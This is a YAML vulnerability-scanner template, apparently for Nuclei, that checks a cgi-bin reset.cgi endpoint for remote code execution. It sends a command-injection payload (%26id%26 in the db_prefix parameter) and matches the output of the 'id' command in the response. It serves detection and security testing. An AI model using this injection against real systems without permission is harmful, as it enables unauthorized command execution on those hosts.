id: cgi-bin-rce

info:
  name: Remote Code Execution - cgi-bin
  author: unk
  severity: critical

http:
  - raw:
    - |
      GET /cgi-bin/dmt/reset.cgi?db_prefix=%26id%26 HTTP/ 1.1
      Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"

      - type: word
        part: body
        words:
          - "file prefix"

      - type: status
        status:
        - 200
